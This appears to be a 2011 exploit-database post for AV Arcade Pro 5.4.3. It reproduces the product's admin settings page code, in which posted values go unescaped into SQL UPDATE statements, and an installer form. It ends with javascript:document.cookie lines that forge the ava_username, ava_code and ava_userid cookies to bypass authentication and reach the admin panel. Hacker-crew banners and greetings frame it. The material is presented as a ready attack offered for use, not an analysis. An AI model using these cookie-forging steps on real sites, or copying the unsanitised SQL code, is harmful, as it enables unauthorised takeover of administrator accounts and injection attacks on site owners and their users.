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AV Arcade Pro 5.4.3 Cookie Manipulation

Posted on 16 October 2011

========================================== AV Arcade Pro 5.4.3 By pass Seting Exploit ========================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=0 0 . .--. .--. .---. . 1 1 .'| ) ) / | 0 0 | --: --: / .-.| .-. . . 1 1 | ) ) / ( |( ) | | 0 0 '---' `--' `--' ' `-'`-`-'`-`--| 1 1 ; 0 0 Site : 1337day.com `-' 1 1 Support e-mail : submit[at]inj3ct0r.com 0 0 >> Exploit database separated by exploit 1 1 type (local, remote, DoS, etc.) 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=1 ####################################################### # Vendor: Powered by AV Arcade Pro - Copyright AV Scripts 2006-2011 # Date: 2011-07-27 # Author : indoushka +++=[ Dz Offenders Cr3w ]=+++ # KedAns-Dz * Caddy-Dz * Kalashinkov3 # Jago-dz * Kha&miX * T0xic * Ev!LsCr!pT_Dz # Contact : ind0ushka@hotmail.com # Tested on : win SP2 + SP3 Fr / Back | Track 5 fr ######################################################################## # Exploit By indoushka ------------- <?php if ($_POST) { $sql = mysql_query("SELECT * FROM ava_settings"); while ($get_setting = mysql_fetch_array($sql)) { if ($get_setting['name'] != 'version') { $value = $_POST[$get_setting['name']]; mysql_query("UPDATE ava_settings SET value = '$value' WHERE name = '$get_setting[name]'") or die (mysql_error()); } } $sql = mysql_query("SELECT * FROM ava_settings"); while ($get_setting = mysql_fetch_array($sql)) { $setting[$get_setting['name']] = $get_setting['value']; } echo 'Settings updated'; } ?> <form id="form1" name="form1" method="post" action=""> <div class="settings"> <div class="settings_h">Site info</div> <div class="settings_left"> <div class="settings_container"><div class="settings_lable">Site name</div><div class="settings_element"><input name="site_name" type="text" class="settings_text_box" value="<?php echo $setting['site_name']; ?>" size="32" /></div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Site URL</div><div class="settings_element"><input name="site_url" type="text" class="settings_text_box" value="<?php echo $setting['site_url']; ?>" size="32" /></div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Template</div><div class="settings_element"> <select name="template_url"> <?php $dir = opendir('../templates'); while(false !== ($file = readdir($dir))) { if($file != "." && $file != ".." && $file != "Thumbs.db" && $file != ".DS_Store") { $template_short = str_replace("/templates/", "", $setting['template_url']); if ($template_short == $file) { echo '<option value="/templates/'.$file.'" selected>'.$file.'</option>'; } else { echo '<option value="/templates/'.$file.'">'.$file.'</option>'; } } } closedir($dir); ?> </select> </div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Site status <a href="#" onmouseover="Tip('Take your site offline for maintenance')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"> <?php if ($setting['site_offline'] == 1) { echo ' <input name="site_offline" type="radio" value="0" /> Online <input name="site_offline" type="radio" value="1" checked="checked" /> Offline '; } else { echo'<input name="site_offline" type="radio" value="0" checked="checked" /> Online <input name="site_offline" type="radio" value="1" /> Offline'; } ?> </div></div><br style="clear:both" /> </div> <div class="settings_right"> <div class="settings_container"><div class="settings_lable">Site description</div><div class="settings_element"><input name="site_description" type="text" class="settings_text_box" value="<?php echo $setting['site_description']; ?>" size="32" /></div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Site keywords</div><div class="settings_element"><input name="site_keywords" type="text" class="settings_text_box" value="<?php echo $setting['site_keywords']; ?>" size="32" /></div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Site email address <a href="#" onmouseover="Tip('Must be an email address at this domain otherwise the emails will be flagged as spam by many services')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"><input name="admin_email" type="text" class="settings_text_box" value="<?php echo $setting['admin_email']; ?>" size="32" /></div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Site offline message</div><div class="settings_element"><input name="offline_message" type="text" class="settings_text_box" value="<?php echo $setting['offline_message']; ?>" size="32" /></div></div><br style="clear:both" /> </div> <br style="clear:both" /> </div> <br /><br /> <div class="settings"> <div class="settings_h">General Settings</div> <div class="settings_left"> <div class="settings_container"><div class="settings_lable">Language</div><div class="settings_element"> <select name="language"> <?php $dir = opendir('../language'); while(false !== ($file = readdir($dir))) { if($file != "." && $file != ".." && $file != "Thumbs.db" && $file != ".DS_Store") { $ext = substr(strrchr($file, "."), 0); $filename = str_replace($ext,'',$file); if ($setting['language'] == $filename) { echo '<option value="'.$filename.'" selected>'.$filename.'</option>'; } else { echo '<option value="'.$filename.'">'.$filename.'</option>'; } } } closedir($dir); ?> </select> </div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">SEO URLs <a href="#" onmouseover="Tip('SEO urls format the urls for better search engine optimisation. Name based are the neatest but ever so slightly more resource intensive')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"> <select name="seo_on"> <?php if ($setting['seo_on'] == 3) { echo '<option value="3" selected>Name based (No ID's reqired)</option> <option value="2">ID Based (ID's required in URL's)</option> <option value="1">Legacy (AV Arcade Free style)</option> <option value="0">None (normal PHP urls)</option>'; } else if ($setting['seo_on'] == 2) { echo '<option value="3">Name based (No ID's reqired)</option> <option value="2" selected>ID Based (ID's required in URL's)</option> <option value="1">Legacy (AV Arcade Free style)</option> <option value="0">None (normal PHP urls)</option>'; } else if ($setting['seo_on'] == 1) { echo '<option value="3">Name based (No ID's reqired)</option> <option value="2">ID Based (ID's required in URL's)</option> <option value="1" selected>Legacy (AV Arcade Free style)</option> <option value="0">None (normal PHP urls)</option>'; } else { echo '<option value="3">Name based (No ID's reqired)</option> <option value="2">ID Based (ID's required in URL's)</option> <option value="1">Legacy (AV Arcade Free style)</option> <option value="0" selected>None (normal PHP urls)</option>'; } ?> </select> </div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Email verification <a href="#" onmouseover="Tip('Do users need to validate their email when the sign up?')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"> <?php if ($setting['email_on'] == 1) { echo ' <input name="email_on" type="radio" value="1" checked="checked" /> On <input name="email_on" type="radio" value="0" /> Off';} else { echo'<input name="email_on" type="radio" value="1" /> On <input name="email_on" type="radio" value="0" checked="checked" /> Off'; } ?> </div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Limit user plays <a href="#" onmouseover="Tip('Force people to sign up after playing a certain amount of games')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"> <?php if ($setting['play_limit'] == 1) { echo ' <input name="play_limit" type="radio" value="1" checked="checked" /> On <input name="play_limit" type="radio" value="0" /> Off';} else { echo'<input name="play_limit" type="radio" value="1" /> On <input name="play_limit" type="radio" value="0" checked="checked" /> Off'; } ?> </div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Module thumbnails <a href="#" onmouseover="Tip('Show thumbnails in the modules (like top 10 games). Will use extra bandwidth due to a number of images having to be downloaded.')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"> <?php if ($setting['module_thumbs'] == 1) { echo ' <input name="module_thumbs" type="radio" value="1" checked="checked" /> On <input name="module_thumbs" type="radio" value="0" /> Off';} else { echo'<input name="module_thumbs" type="radio" value="1" /> On <input name="module_thumbs" type="radio" value="0" checked="checked" /> Off'; } ?> </select> </div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Fullscreen mode <a href="#" onmouseover="Tip('Javascript overlay allows the game to continue being played from the current point and highscore tracking. Windowed is for compatibility issues.')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"> <?php if ($setting['fullscreen_mode'] == 1) { echo ' <input name="fullscreen_mode" type="radio" value="1" checked="checked" /> Javascript overlay <input name="fullscreen_mode" type="radio" value="0" /> Window';} else { echo'<input name="fullscreen_mode" type="radio" value="1" /> Javascript overlay <input name="fullscreen_mode" type="radio" value="0" checked="checked" /> Window'; } ?> </div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Homepage display <a href="#" onmouseover="Tip('Order to display games within categories on the homepage')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"> <select name="homepage_order"> <?php if ($setting['homepage_order'] == 'random') { echo '<option value="random" selected>Random</option> <option value="newest">Newest</option> <option value="toprated">Top Rated</option>'; } else if ($setting['homepage_order'] == 'newest') { echo '<option value="random">Random</option> <option value="newest" selected>Newest</option> <option value="toprated">Top Rated</option>'; } else if ($setting['homepage_order'] == 'toprated') { echo '<option value="random">Random</option> <option value="newest">Newest</option> <option value="toprated" selected>Top Rated</option>'; } ?> </select> </div></div><br style="clear:both" /> </div> <div class="settings_right"> <div class="settings_container"><div class="settings_lable">Featured games</div><div class="settings_element"> <?php if ($setting['featured_games'] == 1) { echo ' <input name="featured_games" type="radio" value="1" checked="checked" /> On <input name="featured_games" type="radio" value="0" /> Off';} else { echo'<input name="featured_games" type="radio" value="1" /> On <input name="featured_games" type="radio" value="0" checked="checked" /> Off'; } ?> </div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Seo extension <a href="#" onmouseover="Tip('The extension on the urls to make it appears as if they are a certain file type. Leave blank to display as folders.')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"><input name="seo_extension" type="text" class="settings_text_box_small" value="<?php echo $setting['seo_extension']; ?>" size="32" /></div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Games per category <a href="#" onmouseover="Tip('If on will display the number of games in each category on the main menu')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"> <?php if ($setting['cat_numbers'] == 1) { echo ' <input name="cat_numbers" type="radio" value="1" checked="checked" /> On <input name="cat_numbers" type="radio" value="0" /> Off';} else { echo'<input name="cat_numbers" type="radio" value="1" /> On <input name="cat_numbers" type="radio" value="0" checked="checked" /> Off'; } ?> </div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Allow embedding <a href="#" onmouseover="Tip('Display the code for users to embed games on their website')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"> <?php if ($setting['add_to_site'] == 1) { echo ' <input name="add_to_site" type="radio" value="1" checked="checked" /> On <input name="add_to_site" type="radio" value="0" /> Off';} else { echo'<input name="add_to_site" type="radio" value="1" /> On <input name="add_to_site" type="radio" value="0" checked="checked" /> Off'; } ?> </div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Unregistered play limit <a href="#" onmouseover="Tip('The amount of games a person can play before they are forced to sign up')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"> <input name="plays" type="text" id="plays" value="<?php echo $setting['plays']; ?>" class="settings_text_box_small" size="32" /> </div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Report permissions <a href="#" onmouseover="Tip('Select who can report comments & games')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"> <select name="report_permissions"> <?php if ($setting['report_permissions'] == 1) { echo '<option value="1" selected>All users</option> <option value="2">Registered users only</option> <option value="3">None (turn off)</option>'; } else if ($setting['report_permissions'] == 2) { echo '<option value="1">All users</option> <option value="2" selected>Registered users only</option> <option value="3">None (turn off)</option>'; } else { echo '<option value="1">All users</option> <option value="2">Registered users only</option> <option value="3" selected>None (turn off)</option>'; } ?> </select> </div></div><br style="clear:both" /> </div> <br style="clear:both" /><br /><br /> <div class="settings"> <div class="settings_h">Adverts</div> <div class="settings_left"> <div class="settings_container"><div class="settings_lable">Show ads <a href="#" onmouseover="Tip('Display the embedded ads on your site')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"> <?php if ($setting['adsense'] == 1) { echo ' <input name="adsense" type="radio" value="1" checked="checked" /> On <input name="adsense" type="radio" value="0" /> Off';} else { echo'<input name="adsense" type="radio" value="1" /> On <input name="adsense" type="radio" value="0" checked="checked" /> Off'; } ?> </div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Default game ad <a href="#" onmouseover="Tip('Default when a game has no set advert to display')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"><select name="default_ad"> <?php $cq = mysql_query("SELECT * FROM ava_adverts ORDER BY ad_name ASC"); if ($setting['default_ad'] == 0) echo '<option value="0" selected>None</option>'; else echo '<option value="0">None</option>'; while($ca = mysql_fetch_array($cq)) { if ($ca['id'] != 1) { if ($ca['id'] == $setting['default_ad']) echo '<option value="'.$ca['id'].'" selected>'.$ca['ad_name'].'</option>'; else echo '<option value="'.$ca['id'].'">'.$ca['ad_name'].'</option>'; } }?> </select></div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Show ABG games to <a href="#" onmouseover="Tip('Show ads before games to')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"> <select name="user_ads"> <?php if ($setting['user_ads'] == 1) { echo '<option value="1" selected>Unregistered users only</option> <option value="2">Unregistered & Registered users</option> <option value="3">All users (including admins)</option>'; } else if ($setting['user_ads'] == 2) { echo '<option value="1">Unregistered users only</option> <option value="2" selected>Unregistered & Registered users</option> <option value="3">All users (including admins)</option>'; } else { echo '<option value="1">Unregistered users only</option> <option value="2">Unregistered & Registered users</option> <option value="3" selected>All users (including admins)</option>'; } ?> </select> </div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Users can skip ads <a href="#" onmouseover="Tip('Display a 'skip this ad' link on ads before games')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"> <?php if ($setting['skip_ads'] == 1) { echo ' <input name="skip_ads" type="radio" value="1" checked="checked" /> On <input name="skip_ads" type="radio" value="0" /> Off';} else { echo'<input name="skip_ads" type="radio" value="1" /> On <input name="skip_ads" type="radio" value="0" checked="checked" /> Off'; } ?> </div></div><br style="clear:both" /> </div> <div class="settings_right"> <div class="settings_container"><div class="settings_lable">Leaderboard Ad <a href="#" onmouseover="Tip('Default leaderboard-position ad. Normally a 728x90 advert')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"><select name="default_leaderboard"> <?php $cq = mysql_query("SELECT * FROM ava_adverts ORDER BY ad_name ASC"); if ($setting['default_leaderboard'] == 0) echo '<option value="0" selected>None</option>'; else echo '<option value="0">None</option>'; while($ca = mysql_fetch_array($cq)) { if ($ca['id'] != 1) { if ($ca['id'] == $setting['default_leaderboard']) echo '<option value="'.$ca['id'].'" selected>'.$ca['ad_name'].'</option>'; else echo '<option value="'.$ca['id'].'">'.$ca['ad_name'].'</option>'; } }?> </select></div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Banner Ad <a href="#" onmouseover="Tip('Default banner-position ad. Normally a 468x60 advert')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"><select name="default_banner"> <?php $cq = mysql_query("SELECT * FROM ava_adverts ORDER BY ad_name ASC"); if ($setting['default_banner'] == 0) echo '<option value="0" selected>None</option>'; else echo '<option value="0">None</option>'; while($ca = mysql_fetch_array($cq)) { if ($ca['id'] != 1) { if ($ca['id'] == $setting['default_banner']) echo '<option value="'.$ca['id'].'" selected>'.$ca['ad_name'].'</option>'; else echo '<option value="'.$ca['id'].'">'.$ca['ad_name'].'</option>'; } }?> </select></div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Small square Ad <a href="#" onmouseover="Tip('Default module-position ad. Normally a 200x200 advert')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"><select name="default_square"> <?php $cq = mysql_query("SELECT * FROM ava_adverts ORDER BY ad_name ASC"); if ($setting['default_square'] == 0) echo '<option value="0" selected>None</option>'; else echo '<option value="0">None</option>'; while($ca = mysql_fetch_array($cq)) { if ($ca['id'] != 1) { if ($ca['id'] == $setting['default_square']) echo '<option value="'.$ca['id'].'" selected>'.$ca['ad_name'].'</option>'; else echo '<option value="'.$ca['id'].'">'.$ca['ad_name'].'</option>'; } }?> </select></div></div><br style="clear:both" /> </div> <br style="clear:both" /><br /><br /> <div class="settings"> <div class="settings_h">Points setup</div> <div class="settings_left"> <div class="settings_container"><div class="settings_lable">Playing a game <a href="#" onmouseover="Tip('The points a user get when they play a game for at least 2 minutes')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"><input name="points_play" type="text" class="settings_text_box_small" value="<?php echo $setting['points_play']; ?>" size="32" /></div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Posting a comment <a href="#" onmouseover="Tip('The points a user get when they post a comment on a game or news article')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"><input name="points_comment" type="text" class="settings_text_box_small" value="<?php echo $setting['points_comment']; ?>" size="32" /></div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Sending a report <a href="#" onmouseover="Tip('The points a user get when they report a comment or game')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"><input name="points_report" type="text" class="settings_text_box_small" value="<?php echo $setting['points_report']; ?>" size="32" /></div></div><br style="clear:both" /> </div> <div class="settings_right"> <div class="settings_container"><div class="settings_lable">Rating a game <a href="#" onmouseover="Tip('The points a user get when they rate a game')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"><input name="points_rate" type="text" class="settings_text_box_small" value="<?php echo $setting['points_rate']; ?>" size="32" /></div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Referring a user <a href="#" onmouseover="Tip('The points a user get when they refer a user using their sign-up link')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"><input name="points_refer" type="text" class="settings_text_box_small" value="<?php echo $setting['points_refer']; ?>" size="32" /></div></div><br style="clear:both" /> </div></div> <br style="clear:both" /><br /><br /> <div class="settings"> <div class="settings_h">Facebook connect</div> <div class="settings_left"> <div class="settings_container"><div class="settings_lable">Use Facebook connect <a href="#" onmouseover="Tip('Allow users to login with their Facebook account')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"> <?php if ($setting['facebook_on'] == 1) { echo ' <input name="facebook_on" type="radio" value="1" checked="checked" /> On <input name="facebook_on" type="radio" value="0" /> Off';} else { echo'<input name="facebook_on" type="radio" value="1" /> On <input name="facebook_on" type="radio" value="0" checked="checked" /> Off'; } ?> </div></div><br style="clear:both" /> </div> <div class="settings_right"> <div class="settings_container"><div class="settings_lable">Application ID <a href="#" onmouseover="Tip('Go to http://www.facebook.com/apps/application.php?id=2345053339 to get this key')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"><input name="facebook_appid" type="text" class="settings_text_box_captcha" value="<?php echo $setting['facebook_appid']; ?>" size="32" /></div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Secret key <a href="#" onmouseover="Tip('Go to http://www.facebook.com/apps/application.php?id=2345053339 to get this key')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"><input name="facebook_secret" type="text" class="settings_text_box_captcha" value="<?php echo $setting['facebook_secret']; ?>" size="32" /></div></div><br style="clear:both" /> </div> </div> <br style="clear:both" /><br /><br /> <div class="settings"> <div class="settings_h">reCaptcha</div> <div class="settings_left"> <div class="settings_container"><div class="settings_lable">Use reCaptcha <a href="#" onmouseover="Tip('Display reCaptcha on the register form')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"> <?php if ($setting['use_captcha'] == 1) { echo ' <input name="use_captcha" type="radio" value="1" checked="checked" /> On <input name="use_captcha" type="radio" value="0" /> Off';} else { echo'<input name="use_captcha" type="radio" value="1" /> On <input name="use_captcha" type="radio" value="0" checked="checked" /> Off'; } ?> </div></div><br style="clear:both" /> </div> <div class="settings_right"> <div class="settings_container"><div class="settings_lable">Public key <a href="#" onmouseover="Tip('Go to recaptcha.net to get this key')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"><input name="captcha_pubkey" type="text" class="settings_text_box_captcha" value="<?php echo $setting['captcha_pubkey']; ?>" size="32" /></div></div><br style="clear:both" /> <div class="settings_container"><div class="settings_lable">Private key <a href="#" onmouseover="Tip('Go to recaptcha.net to get this key')" onmouseout="UnTip()">[?]</a></div><div class="settings_element"><input name="captcha_privkey" type="text" class="settings_text_box_captcha" value="<?php echo $setting['captcha_privkey']; ?>" size="32" /></div></div><br style="clear:both" /> </div> </div> <br style="clear:both" /><br /><br /> <div class="page_button_container"><input class="button2" name="Submit" type="submit" value="Submit" id="submit0" /></div> <br /><br /> <div class="settings_h">Other options</div><br /> These are for when there's issues with URLs or game ratings and do not need to be run otherwise<br/> <a href="index.php?task=recalc_urls">Recalculate URL's</a> | <a href="index.php?task=calc_ratings">Recalculate game ratings</a> </div> </form> ====================================== ?> <form id="form1" name="form1" method="post" action=""> <b>Site info: </b><br /> <label>Site name<br /> <input name="site_name" type="text" id="site_name" value="AV Arcade" class="tb" /> </label> <p> <label>AV Arcade root url<br /> <input name="site_url" type="text" id="site_url" value="<?php echo $url; ?>" class="tb" /> </label> </p><br /> <b>Admin info: </b><br /> <label>Username<br /> <input type="text" name="admin_user" id="admin_user" class="tb" /> </label> <p> <label>Password<br /> <input type="text" name="admin_pass" id="admin_pass" class="tb" /> </label> </p> <p> <label> <input type="submit" name="go" id="go" value="Everything above is correct" /> </label> </p> </form> =============================== javascript:document.cookie = "ava_username=username; path=/"; javascript:document.cookie = "ava_code=password; path=/"; javascript:document.cookie = "ava_userid=user_id; path=/"; ================ Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel =========================== special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te * ViRuS_HiMa * KedAns-D --------------------------------------------------------------------------------------------------------------------------------------